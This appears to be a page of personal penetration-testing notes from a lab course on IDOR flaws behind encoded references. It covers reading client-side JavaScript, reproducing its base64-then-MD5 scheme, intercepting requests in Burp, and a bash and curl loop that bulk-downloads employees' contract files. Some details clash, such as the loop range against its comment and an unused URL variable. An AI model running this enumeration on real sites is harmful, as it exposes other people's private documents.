ENCODED REFERENCES

secure direct object reference uses encoded references to make IDOR enumeration more difficult. one possible way to circumvent and identify potential IDOR on encoded references is if web developers makes a mistake of performing sensitive functions on the front-end (aka function disclosure).

#identification - walk the application - carefully examine, test, and analyze how an application works
root@oco:~$ BROWSER > {targetSite:port}
 Documents
 Contracts
root@oco:~$ BROWSER > {targetSite:port}/documents.php > CTRL+U
 <li class="pure-tree_link">...
root@oco:~$ BROWSER > {targetSite:port}/contracts.php > CTRL+U
 <li class="pure-tree_link">...
 
  ...
 javascript:downloadContract('1')
 
 function downloadContract(uid) {
    $.redirect("/download.php", {
        contract: CryptoJS.MD5(btoa(uid)).toString(),
    }, "POST", "_self");
 }
 
 * this function sends a POST request with the contract parameter. the value it is sending is an md5 hash using the CryptoJS library.
   the value being hashed is btoa(uid), which is the base64 encoded string of the uid variable, which is an input argument for the function.
   it is calling downloadContract('1') and the final value being used in the POST request is the base64 encoded string of 1, which was then md5 hashed.
 
#IDOR identification & testing
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
 Request
  ...
  POST /download.php HTTP/1.1
  Host: 94.237.62.184:42702
  Origin: http://94.237.62.184:42702
  Content-Type: application/x-www-form-urlencoded
  Referer: http://94.237.62.184:42702/

  uid=1
  
  * ALT: on some occassions the data is in an encoded form such as:
     - data
        - contract=cdd96d3cc73d1dbdaffa03cc6cd7339b
        - uid=MQ%3D%3D
     - URL
        - /download.php?contract=MQ%3D%3D

root@oco:~ echo -n 1 | base64 -w 0 | md5sum | tr -d ' -'
 cdd96d3cc73d1dbdaffa03cc6cd7339b
 * the -n flag is used to exclude the trailing new line from the output
 * the the -w 0 flag with base64 is used to avoid adding newlines

 * compare this with the hash on the HTTP request (if used)

#test manual download
root@oco:~$ for i in {1..10}; do echo -n $i | base64 -w 0 | md5sum | tr -d ' -'; done
 cdd96d3cc73d1dbdaffa03cc6cd7339b
 0b7e7dee87b1c3b98e72131173dfbbbf
 0b24df25fe628797b3a50ae0724d2730
 f7947d50da7a043693a592b4db43b0a1
 8b9af1f7f76daf0f02bd9c48c4a2e3d0
 006d1236aee3f92b8322299796ba1989
 b523ff8d1ced96cef9c86492e790c2fb
 d477819d240e7d3dd9499ed8d23e7158
 3e57e65a34ffcb2e93cb545d024f5bde
 5d4aace023dc088767b4e08c79415dcd
 
 * compare each output to the values on the Repeater
 
BURP > Repeater
 Request
  ...
  GET /download.php?contract=MQ%3D%3D HTTP/1.1
  Host: 94.237.62.184:34855
  Referer: http://94.237.62.184:34855/contracts.php
 Response
  HTTP/1.1 200 OK
  Date: Tue, 31 Dec 2024 03:13:25 GMT
  Server: Apache/2.4.41 (Ubuntu)
  Content-Description: File Transfer
  Content-Disposition: attachment; filename="contract_c4ca4238a0b923820dcc509a6f75849b.pdf"
  Pragma: public
  Content-Type: application/pdf

#download all documents from all employees with uids between 1-20
root@oco:~$ nano encodedReferences.sh
#!/bin/bash

url="http://94.237.50.242:58709/download.php?contract="

for i in {1..10}; do
    for hash in $(echo -n $i | base64 -w 0 | md5sum | tr -d ' -'); do
        curl -sOJ -X POST -d "contract=$hash" http://SERVER_IP:PORT/download.php --data-urlencode "$hash"
    done
done

 * The --data-urlencode option in curl is used to URL-encode data before sending it 
   in the request. This is useful when you need to ensure that special characters in 
   parameters (like spaces, symbols, or non-ASCII characters) are properly encoded in 
   a URL-safe manner.
    - When using --data-urlencode, curl automatically encodes the value of a parameter 
      so that it can be safely included in a URL or HTTP request body.
 * the -J means Remote header name:
    - it instructs curl to use the filename provided by the server in the Content-Disposition response header, if available.
       - if the server responds with a header like such as Content-Disposition: attachment; filename="example.txt" curl will save the downloaded file as example.txt instead of the default behavior (saving it with the last segment of the URL).

root@oco:~$ bash ./encodedReferences.sh
root@oco:~$ ls
 contract_1679091c5a880faf6fb5e6087eb1b2dc.pdf
 contract_1f0e3dad99908345f7439f8ffabdffc4.pdf
 contract_45c48cce2e2d7fbdea1afc51c7c6ad26.pdf
 contract_6512bd43d9caa6e02c990b0a82652dca.pdf
 contract_6f4922f45568161a8cdf4ad2299f6d23.pdf
 contract_70efdf2ec9b086079795c442636b55fb.pdf
 contract_8f14e45fceea167a5a36dedd4bea2543.pdf
 contract_98f13708210194c475687be6106a3b84.pdf
 contract_9bf31c7ff062936a96d3c8bd1f8f2ff3.pdf
 contract_a87ff679a2f3e71d9181a67b7542122c.pdf
 contract_aab3238922bcc25a6f606eb525ffdc56.pdf
 contract_c20ad4d76fe97759aa27a0c99bff6710.pdf
 contract_c4ca4238a0b923820dcc509a6f75849b.pdf
 contract_c51ce410c124a10e0db5e4b97fc2af39.pdf
 contract_c74d97b01eae257e44aa9d5bade97baf.pdf
 contract_c81e728d9d4c2f636f067f89cc14862c.pdf
 contract_c9f0f895fb98ab9159f51fd0297e236d.pdf
 contract_d3d9446802a44259755d38e6d163e820.pdf
 contract_e4da3b7fbbce2345d7772b0674a318d5.pdf
 contract_eccbc87e4b5ce2fe28308fd9f2a7baf3.pdf

PreviousPARAMETER MANIPULATION & COOKIE TAMPERING NextINFORMATION ALTERATION

Last updated 3 months ago